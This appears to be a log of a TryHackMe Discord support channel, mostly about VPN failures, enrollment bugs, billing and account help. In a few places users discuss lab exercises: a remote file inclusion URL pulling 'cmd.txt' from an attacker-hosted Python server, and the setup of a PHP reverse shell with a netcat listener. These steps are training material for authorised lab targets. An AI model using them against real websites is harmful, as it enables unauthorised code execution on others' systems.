#site-support

1 messages ยท Page 38 of 1

broken bear
#

yeah, you aren't closing that terminal to run the curl command are you?

lost valve
#

Nope, running openvpn in the background with &

broken bear
#

Do me a favor, don't background it and open a new term window or pane and run the curl command

lost valve
#

Will do

broken bear
#

lets see if there's any new output, and maybe check the journal log as well

lost valve
#

Same result

broken bear
#

Run the VPN troubleshooting script

lost valve
#

MTU failed at 1000

#

That's what sent me here ๐Ÿ˜…

#

any ideas would be greatly appreciated

#

it works without issues on my laptop, I just canยดt seem to get it work on my nethunter phone

#

I can ping google without issues

strange oasis
#

When trying to open a learning pathway I always get Jr Penetration Tester regardless of which pathway I choose. I've tried in both Chrome and Firefox. Anyone else having this problem?

lost valve
#

TX pakets are increasing, RX packets are not

quaint spindle
broken bear
# lost valve MTU failed at 1000

My bet is that it's something to do with the cell network hating your vpn connection; try setting the MTU option manually as an argument to the openvpn command or edit the config file

strange oasis
#

oops, responded to the wrong message

quaint spindle
#

Could you send a ss from what you're trying to click?

broken bear
lost valve
quaint spindle
#

or your browser's cache

strange oasis
broken bear
quaint spindle
#

So even if you click a path like 'Pre-Security' or 'Cyber Defense', it still takes you to Jr. Pentester?

strange oasis
#

I was able to find a link directly to the pathway I want but when I click on enroll it takes me to the Jr Penetration Tester page again

strange oasis
#

Frustrating because I was working on the SOC pathway and can't continue.

quaint spindle
#

right

strange oasis
#

It's odd that it does the same for both Chrome and Firefox

quaint spindle
#

could be a thing where your account saves your last accessed path, and uses that for any links you try to click on.

#

tried making a new account and accessing the SOC path?

rough totem
#

I created some custom paths in our management dashboard for our different classes, when ever I click the join link it takes me to the same path (i.e. click the CYB 331 path and it takes me to the CYB 453 path). I tried different browser, clearing cache and incognito. Seems like a problem similar to @strange oasis

strange oasis
#

I can get to it if I'm not logged in. As soon as I log in it takes me to Jr Pentester

rough totem
#

it also happens if I click a generic THM path

worldly zodiac
#

@broken bear can you re verify me when you have a chance or point me in direction to do it ๐Ÿ˜

broken bear
strange oasis
#

I just logged in using Microsoft Edge. I have never been to TryHackMe using this browser before. Still takes me to Jr Pentester

rough totem
#

maybe there is an issue on their backend that tracks the path you are on

lost valve
#

update: tried switching to mobile data

#

curl: (7) Failed to connect to 10.10.10.10 port 443 after 78 ms: Couldn't connect to server

#

curl fails this time instead of hanging there

strange oasis
#

Must be.

worldly zodiac
#

@broken bear need to update my token had not change discord accounts unfortunately so my token says it have one applied to this discord already

lost valve
#

ping fails with TTL value exeeded

broken bear
strange oasis
broken bear
robust gale
#

any tips or steps to get better machine stability? Multiple rooms machines crashing on me under 5 minutes...

strange oasis
scenic torrentBOT
#

Gave +1 Rep to @quaint spindle

worldly zodiac
#

@broken bear yes please

lost valve
rough totem
lost valve
#

thanks a lot friend!

#

will update you once tested

strange oasis
#

That worked. thanks again.

rough totem
#

Great! Have fun

worldly zodiac
#

thanks juun veri the correct token thanks a million

bronze escarp
#

Hello. I just checked out AWS path which is locked. After I opened the path i understood it was not available for me, so fine. But now i am kinda stuck in the path. Attempts to enroll in other paths just redirects me back to AWS path. I cannot open any other path. Seems crazy but has someone experienced it before?

plush bay
#

ooh 2 people with the same problem

#

and there we go a third it happens to shadow too

#

@tawdry orbit seems something is messing up the changing of current active path for users keeping them stuck in a single one when trying to view the others

nocturne lantern
#

Hi allโ€” I canโ€™t seem to select any other learning path on the site

#

I want to switch over to a different one but every link takes me back to my current enrollment

#

Anyone experienced this before? Is this a site bug?

bronze escarp
#

Yes you are not the first

nocturne lantern
#

Ok Iโ€™m not going insane. Thank you

bronze escarp
tawdry orbit
#

Forwarding this one. It seems to be with any path switch, not just from AWS to another path. Thank you for reporting. ๐Ÿ™‚

scenic torrentBOT
#

Gave +1 Rep to @tawdry orbit

bronze escarp
scenic torrentBOT
#

Gave +1 Rep to @tawdry orbit

plush bay
tawdry orbit
#

We're looking at the issue at the moment. ๐Ÿ™

serene heart
#

uh I can't seem to change my email to my student email (which I hope is supported since it's @du.se)

#

Swedish university (Dalarna University)

#

ok it finally worked, weird. Must have been a bug or request overload ๐Ÿ‘

tawdry orbit
#

@rough totem @bronze escarp @strange oasis @plush bay Should be working now. ๐Ÿฅณ

rough totem
scenic torrentBOT
#

Gave +1 Rep to @tawdry orbit

scenic torrentBOT
#

Gave +1 Rep to @tawdry orbit

lost valve
#

Hi guys, tested on different network with same results

#

Same output for the ts script, MTU value failed at 1000, aborting MTU check

#

Tried setting the MTU on the IF to 900 but same thing

#

Tried 1460, 1300, 1200, 1000, 900, all yield same results

#

I tried again on my laptop running kali on WSL2 which used to work but for some reason that ain't working either

#

@broken bear

broken bear
#

we have exhausted my knowledge of what i've seen to troubleshoot. Best bet for the next step is to email support, i think

lost valve
#

Thanks a lot for your help and patience, will email support

zinc canopy
#

anyone here?

tulip river
#

hi there

#

i have problem with logging into my account

naive dust
#

Can OpenVPN work on a mobile 3G hotspot ?

weary spindle
weary spindle
weary spindle
tulip river
#

login failure

#

and forget password don't work

#

my account name is aelwalol

#

and i forget the linked email

#

but iam sure it's one of 2 email

#

and the problem is conflict email address and login with google feature

weary spindle
#

If you didn't sign up with google, you can't use it to log in.

#

You'll need to email support.

#

!email

sharp bisonBOT
#
TryHackMe
Contact us for support, teaching enquires and more!
spice ember
#

I got "Connection Timeout" when I tried to connect OpenVPN. Is anyone else experiencing the same problem?

weary spindle
spice ember
#

I just try to connect with my conf. file (EU VIP1). I seems connected in the access page but it's not.

weary spindle
#

That page can be bugged,

Do you have an error?

spice ember
#

I get Connection Failed on OpenVPN GUI

weary spindle
#

Oh wait, GUI.

Are you on Windows?

spice ember
spice ember
weary spindle
spice ember
#

yes

weary spindle
#

I'd suggest not using your host on the network.

#

I'd create a VM, if you have the resources.

spice ember
#

I setted VM I want to connnect with NAT connection on my host

#

Is it possible

weary spindle
#

The VM will connect with NAT.

#

I use NAT for my vm's.

spice ember
#

And you suggest to set openvpn on vm right?

weary spindle
#

You won't need to.

You just need to download your configuration file and connect with

sudo openvpn path/to/file/*username*.ovpn

#

That will create a tunnel to the THM machines.

spice ember
#

Ok. I'm on windows host. My vm is linux so I should use on vm

weary spindle
#

Yes

spice ember
#

thank you I will try

grizzled scarab
#

Openvpn issue still there

naive dust
#

I have an issue with my account, I reactivated premium on 13 July - worked for 1-2 days and now it says I do not have premium anymore.

grizzled scarab
#

Any help with the openvpn connection

#

Solved

naive dust
#

Anyone know how to get the discount voucher for the merch? The 5% off for the 45 day streak

plush bay
naive dust
scenic torrentBOT
#

Gave +1 Rep to @plush bay

weary spindle
#

You need to E-mail support.

plush bay
#

think one of the people with thm staff could probably answer.... not so much anyone else

weary spindle
#

!email

sharp bisonBOT
#
TryHackMe
Contact us for support, teaching enquires and more!
plush bay
#

yeah that is a good route too

weary spindle
#

It's the only route ๐Ÿ˜„

plush bay
#

don't really care as would like to support tryhackme with more money anyways

weary spindle
plush bay
#

because they nevered messaged for a a discount code

plush bay
scenic torrentBOT
#

Gave +1 Rep to @weary spindle

weary spindle
#

With the amount of users in THM, and it was manual, Jabba would spend all day E-mailing people.

plush bay
scenic torrentBOT
#

Gave +1 Rep to @plush bay

plush bay
north tulip
#

Is there any option to change username now ?

plush bay
#

then from there use the send a message and then help with my account then i would like to change my username

north tulip
scenic torrentBOT
#

Gave +1 Rep to @plush bay

plush bay
north tulip
#

Oh kk . ty again

plush bay
#

no problem

tribal burrow
#

you need username@ip

plush storm
#

nah not necessary see my phone network works 100% i just want Initial connection

tribal burrow
#

you use local VM on THM attack box ?

#

and what room is that?

weary spindle
#

Everything body is having issues with their phone networks these days, wonder if something is fished to stop making it work.

#

@north tulip you'll also need to regenerate your vpn, you'll also be assigned a new tun ip.

weary spindle
#

I should have made that cleaerer

north tulip
fervent spire
#

Yo does someone here know how can I paste into a windows machine in the browser RDP seem to work very poorly for me

stiff gulch
#

There should be like a little tag on the left side that you can expand. Then select the middle button. From there it should work

weary spindle
woven kelp
#

I already paid my subscription last 2 days but until now it says Payment Pending
You will automatically be navigated away from this page when the payment is confirmed. help me

glacial isle
#

this is the guide for subscribers for which path they should take but i cannot seem to find the link for CC:Pentesting path

pastel tinsel
weary spindle
#

Must be A|B testing.

#

I know the website is being re-designed.

exotic dove
#

must be a hacker*

#

I still have the old design here

naive dust
#

Hey can someone help me please?

I will no longer be able to access my account, so I need to at least cancel my subscription.

I had an autogenerated password by my browser to my THM account AND to my Email. My computer won't boot so I lost access to both Email and THM account.

I can easily create a new THM account, but the old one would be renewing the subscription and taking my money.

glad oyster
#

!email

sharp bisonBOT
#
TryHackMe
Contact us for support, teaching enquires and more!
glad oyster
#

cc @bronze vale can they contact their bank to stop it while waiting for a response from support?

weary spindle
naive dust
# weary spindle Was it a password manager?

It was the built-in keychain in Firefox but I wasn't using a account.

I tried everything so my only option is cancelling the subscription somehow..

I do have the account paired with my Google Authenticator app on my phone, but I doubt that will help

weary spindle
bronze vale
rotund python
#

Hello, I keep getting disconnected from machines in every five seconds or less. My internet connection is good, I don't know what is wrong. It used to be fine but now it is impossible to do the tasks.

olive idol
#

why doesnt telnet work for the target's ip on my kalininux (stuck on "trying") but it works on the site's ran machines?

olive idol
bronze vale
olive idol
naive dust
weary spindle
glacial hound
weary spindle
glacial hound
bronze vale
weary spindle
#

Ah, got ya

naive dust
nocturne heath
#

mr.robot i start machine and dialog box with timer no longer comes up with the room discontinued?

#

is*

bronze vale
nocturne heath
#

ah well that would explaine thanks

jovial echo
#

Same experience on 4 different networks

jovial echo
#

Just latency, however I thought tryhackme would have servers close to Australia

pastel tinsel
bronze vale
pastel tinsel
bronze vale
#

I have write permission, but not sure if I am allowed to add rooms there hah]

pastel tinsel
bronze vale
#

Already have :P

zealous yoke
pastel tinsel
zealous yoke
#

everythang jabba is a blessing prayge

pastel tinsel
zealous yoke
#

indeed ๐Ÿ˜„

#

almost like that was the plan

pastel tinsel
bronze vale
bronze vale
pastel tinsel
zealous yoke
#

I mean I can break it to prove a point

bronze vale
#

You aimed at Ben but accidentally shot me:(

zealous yoke
#

that i'm veyr good at

bronze vale
#

I bet I can break @marble breach with one command ๐Ÿ˜†

pastel tinsel
zealous yoke
#

so can I, sudo shutdown now ๐Ÿ˜›

pastel tinsel
#

So can I!
!help

marble breachBOT
#
Pong!
API Latency

103ms

Client Latency

377ms

#

Translated text: hi

bronze vale
#

QUE?!

#

It's not meant to do that

zealous yoke
#

I mean I suppose it's technically right. translating english into english lmfao

bronze vale
zealous yoke
#

Lmfao I like that the โ€œnot working as intendedโ€ is the fact that it is working

pastel tinsel
#

/translate

naive dust
#

Room: Windows Privilege Escalation

Task 6, Machine is starting but wont show the gui

plush bay
#

really??? does windows clear logs at reboot/restart???

#
me
121141
borgqueen se
was awarded a badge
, 7 .
Level ;
vi Sie 3
Hash Cracker :
Cracking all those hashes
Come learn all things security at TryHackMe
#

so looks like it is some saved data for a badge reward if you clear out the \n new line chars

#

the other picture looks like jumbled encoded data parsed as unicode though

#

still would encourage someone like @bronze vale or someone else maybe look into the above

bronze vale
#

What extension is the file

#

You said it was on your desktop, right?

#

So close it and then view the file extension

#

Might have just been a temporary file

woven basin
#

hidey ho neighborinos! i'm having the dangedest problem trying to access the network on the 'breaching ad' room.

#

yes have the vpn for breachingad

#

changed DNS in NetworkManager to the thmdc IP..also did a systemctl restart networkmanager after

#

but when i nslookup or try to ping, host is unreachable. i also tried the resolv.conf file !! no joy

#

i'm beginning to think it was my VM networking but i've tried both NAT network and bridged. i'm outta ideas

#

i followed two walkthroughs haha no luck angrycooctus

hollow notch
#

I used what's suggested in the forum. I have a script that modify somethings but I still get caught with it.

naive dust
#

Is it normal that the IP Address in the "Active Machine Information" is different from the AttackBox IP Address?

#

I'm doing the Jr Pen Tester, I'm at File Inclusion and I'm supposed to have a file called cmd.txt, but when i type it in my browser (http://10.10.x.x./cmd.txt)

One IP says Not Found
And the second IP says Error code 405

#

I tried restarting everything many times, but I always get a different IP at the top of the THM page (next to my hacking streak) and a different IP inside the AttackBox

zealous yoke
# naive dust I'm doing the Jr Pen Tester, I'm at File Inclusion and I'm supposed to have a fi...

You're confusing the AttackBox with the machine that you deploy in the task.

The AttackBox is deployed using the blue "Start AttackBox" button at the top of the room, the target/vulnerable machine is the one that is deployed using the green "Start Machine" button.

There will be a card at the top of the room that will display the IP address that you are supposed to attack. The IP at the top of the THM page next to your hacking streak is either your AttackBox (not the machine you're supposed to target), or the IP address of your VPN connection ๐Ÿ™‚

naive dust
scenic torrentBOT
#

Gave +1 Rep to @zealous yoke

zealous yoke
#

#1 is the AttackBox (via the Start AttackBox button)
#2 is the IP address of the machine that you need to target or interact with. In this case, it is 10.10.231.210. So, using your example, I would need to access 10.10.231.210/cmd.txt

#

you would replace that with whatever is displayed in that card (#2)

naive dust
zealous yoke
#

Mhhm okay. That is the correct ip ๐Ÿค”

#

Let me double check the room - I haven't done it for a while. What task are you on?

naive dust
#

Yeah it's strange, its Task 6

zealous yoke
#

Okay, so it looks like that IP/cmd.txt is just an example?

#

And just below, it asks you to try out an RFI attack. I would presume that the machine is configured so that /cmd.txt can only be get through a certain way.

naive dust
#

I get what you mean but i tried that too

#

I sent the wrong screen actually but yeah I did try multiple things

#

This is the correct link I believe, but doesn't work

zealous yoke
#

Ah, okay I understand now

#

Right so essentially:

  1. You need to create and host the cmd.txt from your machine (I.e. Kali) using something such as python server for example:

Let's say that the attacker hosts a PHP file on their own server http://attacker.thm/cmd.txt where cmd.txt contains a printing message Hello THM

  1. http://attacker.thm/cmd.txt in the http://webapp.thm/index.php?lang=http://attacker.thm/cmd.txt needs to be the IP address of your machine.

  2. Say I create a file name cmd.txt and fill it with cmnatic on my Kali, which has a VPN IP of 10.14.32.16, I would do: http://webapp.thm/index.php?lang=http://10.14.32.16/cmd.txt that should display cmnatic on the site

Haven't tested, but I think that's my understanding of what the task is wanting you to do after having a re-read of it

naive dust
#

Yes I tried creating the .txt file using echo whatsup > cmd.txt in the terminal

but that didnt help

So i guess im supposed to find how to "host the file" ?

zealous yoke
#

Okay yup so echo whatsup > cmd.txt is the first step. But now you need to "host" the file so that the remote machine can access it. Something like a python http server is really quick and easy for this: python 3 -m http.server

#

Oh okay I've got it. I can show you what needs to be done. Wanna hop in VC and I can share my screen/talk through it?

naive dust
#

Yea sure that'd be great

zealous yoke
naive dust
#

@zealous yoke Thank you so much mate ๐Ÿ’ช

scenic torrentBOT
#

Gave +1 Rep to @zealous yoke

zealous yoke
plush bay
#

no but sounds like something that would be interesting but don't think aws supports mac virtual machines for target machines

zealous yoke
#

not currently unfortunately. I have a room on iOS forensics but that's pretty much it for anything mac. This is because it is extremely hard to virtualise and such

zealous yoke
plush bay
#

ah

#

well then that is not happening easily

zealous yoke
#

at least not at the moment

#

Not that I can think off on the top of my head. Could be a tool saving a HTTP request or something - hard to tell without knowing what you were doing at the time the file was created

#

ah mhhm strange. Yeah, I'm not entirely sure to be honest with you ๐Ÿ˜…

plush bay
#

jabba asked around about it earlier too

#

so it is a bit of a mystery and without much info on it we can do near null

still coral
#

how do the scoreboards in challenge rooms work? looks like It's always just 10 random users

plush bay
#

the first 10 completers shadow thinks

#

with blood points to the person that answered the task question first

tawdry orbit
#

Sorted on points, the user viewing is always at spot 10 unless they have more points than spots 1 to 9.

still coral
#

i don't see any blood points - all the 1-9 spots have the same amount of points

tawdry orbit
#

Not all rooms have blood points, usually only challenges, but sometimes walkthrough rooms.

still coral
#

expecially since

85429 users are in here and this room is 1432 days old.

frosty obsidian
#

i've seen a few questions, but no real answers. i have a 45+ day streak and am looking for 5% off, but I received no coupon code and the prices are the same in the store. What am I missing?

vast python
#

Hey ya'll. I need help. Trying to terminate machine, and when I press button to terminate, it terminates but really doesn't, I reload page. It still has time counting down. I have done this numerous time. Cleared Cache and still same issue. This is really weird. I will let the time runout and see if the machine is still running but why do that?! I need to know why it is acting like I never pressed the terminate button!!!!

#

I am assuming your good now? I am having the same problem you were. What is the cause of it? Why do I have to wait for time to runout for it to self terminate. This is very frustrating and I don't have time like that

vast python
#

Doesn't work

#

for me at least

#

Im just gonna go to bed, wake up and see whats up, I have an hour and some change left on machine. i'll come back with update...

weary spindle
solar finch
#

I've got a Kali VM that connects to THM via VPN. Do I need to worry about the VPN randomly disconnecting and causing me to do something malicious on the Internet?

olive idol
#

i have problems with kali linux where can i get help

cold lava
#

Hello, I have a problem with accessing the machine. I did the steps on this room https://tryhackme.com/room/openvpn
I started a machine at 10.10.105.136

At the end it says:

Go to http://10.10.105.136 - can you see a website?

But then I get the "connection timed out error" on the browser. I have the OpenVPN connected with the config from the access page.
Does anybody know why this happens?
I can't complete the room without accessing the machine from the browser...

naive dust
#

@zealous yoke Hey bro I'm trying to do my first rev shell but I can't remember the website you visited to download some files

zealous yoke
naive dust
scenic torrentBOT
#

Gave +1 Rep to @zealous yoke

naive dust
#

Is there a easy way to do that?

#

File Inclusion Task 8 - flag 3

zealous yoke
zinc hemlock
#

Hello, just a quick question. I submitted a writeup yesterday to vulnversity and it's under review, can i know how long is it going to take? Because i read in a forum it's all upto the owner of the room and you gotta let em know. So here I am

bronze vale
zinc hemlock
#

Because the rooms old or?

bronze vale
#

Yes

zinc hemlock
#

Okay np

naive dust
upper flame
#

Hi, I have finished the pentester jr route, but in the certificate, my name is wrong by one letter.

I would like you to help me correct the name of my certificate.

My username is: ZizuPM

Receive a cordial greeting.

sturdy sky
#

@hello team, can someone support here or address me to the right room, please ?

weary spindle
sturdy sky
#

Despite the membership, I cannot login nor reset my login password. I have sent several emails but no feedback.can you support please ?

weary spindle
#

There is a 3 day wait for support.

However if you E-mail more than once, it will push you furhter back down the queue.

sturdy sky
#

Ok, clear. Thanks for your answer โ˜บ๏ธ

mild rapids
#

Hello there i have a problem i cant accsed to a machine altough i am connecting to the openvpn ?

mild rapids
naive dust
# mild rapids Yes it is working

some rooms have machines that haven't disabled firewall rules etc so i would use the attackbox. happens to me especially on the EternalBlue room

mild rapids
#

so i should use the attack box not the host directly

naive dust
#

yep i presume you mean the book site?

mild rapids
#

If it yes is there is nothing else to do ?

naive dust
#

nope not really, you can report it in room-bugs but tbh most of the rooms are outdated

naive dust
mild rapids
naive dust
mild rapids
naive dust
#

try restarting the machine

#

also check with "ss -tulpn" on how many openvpn connections you have

#

if you have more than 1 then kill the rest

#

remember that its on port 82 aswell

mild rapids
#

Yes it worked , i didnt start the machine from the first and secondly i specify it on port 82

naive dust
#

so it works now?

mild rapids
#

Thank you so much @naive dust

scenic torrentBOT
#

Gave +1 Rep to @fierce flare

naive dust
#

np

mild rapids
#

Yes it worked

distant ether
#

hi

mild rapids
#

Hey

distant ether
#

i have problem with

#

subscription

#

is there any support guy here

mild rapids
#

What is the problem , is there any one that could help you he / she will ?

distant ether
#

i have paid my subscription fee

#

but i cant use my premium account

raven echo
#

Is there any way to change card details without cancelling the subscription?

scenic torrentBOT
#

Gave +1 Rep to @weary spindle

raven echo
distant ether
#

yes

#

#9518

#

ticket id is #9518

#

so when they help me ๐Ÿ˜ฆ

#

i wanted to go ad lab

#

i made my payment already

naive dust
#

Hello ~ apologies for bugging about this again, I have looked a the THM forum and found no answer to my problem. My prblem is I am still having issues with thm-troubleshoot script and recieving the following result below:

naive dust
#

Update: I think i fixed with this

weary spindle
oak pagoda
#

do you know what i should do?

weary spindle
#

Can you verify your account and attach screenshot.

#

!docs verify

sharp bisonBOT
oak pagoda
weary spindle
surreal kite
#

I believe I might have a solution to that, just need to switch my machine, one moment

oak pagoda
#

can i send it to your md?

surreal kite
#

try:
openvpn --data-ciphers 'AES-256-CBC:AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305' --config <path to config file>

oak pagoda
#

i dont know if it have private things

weary spindle
surreal kite
#

oh sorry I didn't know there's something wrong with this but it has been working for me

#

may I ask why it should not be suggested?

weary spindle
#

We like to suggest users either use the Troubleshoot script, or regen their vpn file,

We don't suggest this (by mods request)

โ€ข people shouldn't run code on their machines without knowign what it does.

โ€ข Some people suggest the sed code, and it doesn't just replace it one config, it changes them all, so they could have multiple .ovpn files in their folder, that may or may not no longer work.

#

Also, I doubt you, yourself will blindly run code without knowing what it does.

#

And I'm not a mod/staff, I'm just relaying what we have been asked to do, in this case.

surreal kite
#

Oh sorry I'm new to here, didn't know that's the case, just bumped into what feels like the exact same issue before and wanted to suggest a solution. By no means I would encourage to run any code blindly, and by sending the command I suspected that user will do the research on what the command does before running it.

viscid brook
#

Hi, I can't get a student discount on my subscription, I would appreciate it if someone could help.

weary spindle
#

!email

sharp bisonBOT
#
TryHackMe
Contact us for support, teaching enquires and more!
surreal kite
#

I've also encountered one problem recently. During a specific timeframe (around 9 pm-11 pm CEST this Monday), I've not been gaining any points for answering questions (tried different rooms). Issue stopped occurring in the morning of the following day but points that I've gained during that timeframe (about 400 points) have not came back. I've written an email to support but have not received any response yet. Is it a known issue? Is there anything else I should try?

#

I can share much more details about this if needed. Did some tests during that time frame to confirm that (which I sadly have not recorded) and I'm 100% certain the issue was there, beyond any doubt. If I, lets say, created new account and completed all the same rooms I have completed now, there would be a ~400 points discrepancy between my current account and that new one.

karmic karma
#

Hello, I have sent an email to the support over a week ago about the student discount including verification but heard nothing back so far.

bronze vale
karmic karma
#

dm'ed!

zinc hemlock
#

The site's down? It's throwing 500

lilac anvil
#

I'm setting up OpenVPN for TryHack me for the first time. Windows 11, fresh install.

The connection in OpenVPNGUI just keeps looping and the log shows this:

Client exception in transport_recv: crypto_alg: BF-CBC: bad cipher for data channel use

I run the program as admin. I'm using the latest version for win 11 on the site. I tried rebooting. Tried installing and uninstalling. I've tried different servers for OpenVPN. The connection exists in network settings.

Anybody have any ideas?

lilac anvil
# lilac anvil I'm setting up OpenVPN for TryHack me for the first time. Windows 11, fresh inst...

Okay, so I found the solution here: https://tryhackme.com/forum/thread/62bc5fb1fcafa700618f25f0

The thread is from a year ago, and the response from a community member 5 months old, but still a problem I see. I had to add a line to the config file:

cipher AES-256-CBC
data-ciphers AES-256-CBC

Just doing "data-cipher AES-256-CBC" or "cipher AES-256-CBC" independently was ineffective. Both lines had to be present and it connected immediately.

Update your config file generator please!

bronze vale
#

It sounds like you haven't regenerated your OpenVPN file

lilac anvil
# bronze vale What VPN server are you using?

It defaulted me to EU-Regular-3 when I first generated one.

Then I tried EU-Regular-2
Then US-East-Regular-1
Then EU-Regular-1

Then I went back to 3 to continue troubleshooting and adding the lines to the config file are what solved it.

bronze vale
#

Did you press the "regenerate" button?

lilac anvil
bronze vale
#

Our OpenVPN servers are working fine

lilac anvil
# bronze vale

Don't know what to tell ya. I tried ever other setting change and troubleshooting recommendation I could. The config file line addition is the only thing that's worked.

I just regenerated and downloaded another config file just now and it did not work. Loaded the previous config with the line edit and it works instantly.

lilac anvil
# bronze vale

Does it hurt anything to add the line as a "cover all bases" approach?

bronze vale
#

Yes

#

In the newest versions of OpenVPN, the cipher line is becoming depreciated.
Soon, OpenVPN will not accept the cipher line and you will not be able to connect.

lilac anvil
bronze vale
#

We are looking to improve our infrastructure to ensure that our OpenVPN configurations are working for the newest versions of OpenVPN.

See here: #site-support message

lilac anvil
# bronze vale We are looking to improve our infrastructure to ensure that our OpenVPN configur...

Keep this conversation in mind if this issue crops up for others. There's other people on the forum also experiencing it and the same solution works for them. Even if ciphers is deprecated, the Server handshake code might still be looking for the line to be there for some arbitrary reason before it looks for the data-ciphers line. Thanks for being so prompt with responses and information though. Just glad I found a solution before I gave up.

scenic torrentBOT
#

Gave +1 Rep to @bronze vale

cobalt oriole
#

I try use OpenVPN in Windows using OpenVPN room. The VPN is connected. But I can't access the server.

#

There is warning in the log, mention about "sweet32 attack"

#

And there is "SESSION INVALIDATED KEEPALIVE_TIMEOUT"

#

Please help to solve the problem

naive dust
#

Gonna test here again after class. I'll hop on discord again around 12PM PST

timber magnet
bronze vale
timber magnet
wise gale
#

how do you earn the wireshark badge? i have completed all the wireshark rooms in the SOC path. what am I missing? thanks ๐Ÿ˜‰

tawdry orbit
bronze vale
timber magnet
scenic torrentBOT
#

Gave +1 Rep to @bronze vale

timber magnet
naive dust
#

anyone know what to do if your streak gets reset before the day is over? any help is much appreichated ๐Ÿ™‚

jagged lava
#

Am new here and am happy to subscribe this ๐Ÿ™‚

Question; I just go to 'Dashboard' and take the challange one by one but in the footer, they say, "this room are free" (I have 'study' in 4 days now)

Should i just continue, and paid rooms will come later on
Or
I need to select room other places on the page?

tribal burrow
#

the big amount of thm can be done without subscription. if you pay for sub there is more rooms to do.

jagged lava
#

Okay, thanks - So i should just continue from Dashboard?

tribal burrow
#

if you go to Learn tab

#

there is path that you can follow to go with the flow in premade order to learn

wise gale
sharp bisonBOT
#
TryHackMe
Contact us for support, teaching enquires and more!
weary spindle
#

Contact support. ๐Ÿ™‚

distant ether
#

I regret paying

#

no support

#

integration problem between 2 software and no one here to help me :S

weary spindle
#

Support is going through a 3-4 day response time.

bronze vale
distant ether
#

about 2 days

bronze vale
#

Weโ€™re on a 3-4 day wait time ๐Ÿ™‚

distant ether
#

oh yeahh ๐Ÿ˜„

#

wonderfull news

somber musk
#

Hey, I opened my thm after a long time
and my account was banned
i didnt do anything wrong
please help me out

#

@bronze vale

bronze vale
#

Username? @somber musk

surreal kite
bronze vale
somber musk
#

My original one is safe

#

Sorry for the waste of your time

bronze vale
#

Youโ€™re aware that if youโ€™re banned on one account.. youโ€™re banned on them all right?

bronze vale
#

I have your username for your main account, please send your test accountโ€™s username or I will be forced to ban you.

bronze vale
#

Sure

white nimbus
#

Can someone from support help me get my account login back please?

weary spindle
white nimbus
weary spindle
white nimbus
weary spindle
white nimbus
#

Since I have be waiting from the 1st of june I have been patiently.

bronze vale
mighty musk
#

Hello everyone, today i want to pratice my skills but when i start a machine, i cant pratice on the ip who thm gives me... idk why but that is the same for all challs coolguy

weary spindle
#

Are you using your OpenVPN gui on your Windows host?

mighty musk
scenic torrentBOT
#

Gave +1 Rep to @bronze vale

marble breachBOT
#

Done!

minor remnant
#

How can In copy text and files from my attack box to host machine. PS: Clipboard doesn't work

rustic vine
plush bay
#

that does not work??

minor remnant
weary spindle
minor remnant
plush bay
#

hmm weird

minor remnant
crystal marlin
minor remnant
#

Just text.

#

I am on the Threat Intelligence Tools lab and they didn't have to option to download lab files too.

rustic vine
minor remnant
rustic vine
#

Oh then no idea why the clipboard that Shadow showed a gif of should populate with the info when you copy out of an attack box

plush bay
#

aaah

#

that specific room is not the attackbox

#

and the files on said target machine that opens in split view also uses some malware samples

#

so do not try and download said files onto your own machine

rustic vine
#

Ahh good catch Shadow

minor remnant
plush bay
#

Scenario:
You are a SOC Analyst and have been tasked to analyse a suspicious email Email1.eml. With the skills learnt on this task and using Thunderbird, answer the questions below.
for those wondering what said lines say

#

the important part being using thunderbird

sullen oriole
#

Hi I'm doing "Net Sec Challenge" and I can't connect to FTP server. Any issue with the server?

sullen oriole
weary spindle
sullen oriole
weary spindle
sullen oriole
weary spindle
sullen oriole
#

yeah and I know the ftp port is 10**

weary spindle
sullen oriole
#

it's strange coz hydra is giving me some trouble too

weary spindle
#

Can you send a screenshot?

#

I can connect to the FTP fine.

sullen oriole
weary spindle
#

1021?

sullen oriole
weary spindle
#

..Are you sure?

weary spindle
sullen oriole
sullen oriole
weary spindle
#

(if you're in a vm, you might not have rockyou.txt in the same location as the hint)

sullen oriole
scenic torrentBOT
#

Gave +1 Rep to @weary spindle

oblique vapor
#

Is there a way to change the name on the certificate from my username to my full name? (I accidentally chose the username and now when I changed it to my full name the certificate does not get updated sadly)

#

sorry if i am in the wrong channel for these kind of questions :/

weary spindle
#

You can't change the name on a certificate after it's generated.

#

You'll need to either use paint, or create a whole new account

oblique vapor
#

oh ok thanks for the answer :/ and for some reason the verification here does not work for me i dmed the bot with my token but yh...

weary spindle
#

The discord bot will have no effect on your certificate.

#

Unless you're trying to upload it here.

oblique vapor
#

yes I know I just wanted to verify my account here its another problem besides the cert ๐Ÿ˜„

weary spindle
#

Did you use

!verify *discord token*

oblique vapor
#

yes I did

weary spindle
#

Did you get an error message?

oblique vapor
#

nope i didnt get any answer thats why I am kinda confused

weary spindle
#

Are your dm's open?

oblique vapor
#

yes

weary spindle
#

@zealous yoke

Is the bot stuck again?

(Ping worked in bot commands)

weary spindle
# oblique vapor yes

I've pinged staff, there's nothing I can do, the verification should be instant.

oblique vapor
#

ok ty anyways ๐Ÿ˜„ maybe it fixes itself idk

weary spindle
#

And due to my red teamer role, the bot no longer replies to me.

zealous yoke
weary spindle
solid citrus
#

hey guys im a bit new to all of this and i'm running into an issue connecting to openvpn. I went through the tutorial on downloading and installing it that was linked in the Linux Fundamentals Part 1 room. The install and setup seemed to go fine but i am stuck on connecting. after looking at the log file it seems im getting this error but I have no idea how to fix it.

[Jul 24, 2023, 14:02:18] Connected via TUN_WIN
โŽ[Jul 24, 2023, 14:02:18] Per-Key Data Limit: 48000000/48000000
โŽ[Jul 24, 2023, 14:02:18] Client exception in transport_recv: crypto_alg: BF-CBC: bad cipher for data channel use
โŽ[Jul 24, 2023, 14:02:18] Client terminated, restarting in 2000 ms...
โŽ[Jul 24, 2023, 14:02:18] SetupClient: signaling tun destroy event

any help would be appreciated

weary spindle
solid citrus
#

hmm when i hit the question mark button after starting the machine it was under the use a vpn option, im assuming its just for later tasks then?

weary spindle
#

Different rooms.

However Linux Fundemental 1 has a split screen machine

naive dust
#

Hello I have a question

plush bay
naive dust
#

I figured out I actually need a somewhat knowledge of link and how it works

#

Hey guys I need help, so I'm doing Command injection and I already got the flag but I want to do a reverse shell.

I figured that if I put a semicolon first in the input box, I can run commands like whoami, hostname, etc.

so now I'm trying to do the php reverse shell that I downloaded from pentestmonkey from github

I change the rev shell file to my IP, and port to 4444, I start listening using "nc -lvp 4444", and I start a server using "sudo python3 -m http.server"

But now I'm stuck, in previous rooms I accessed the php file using the url "index.php?file=http://........"
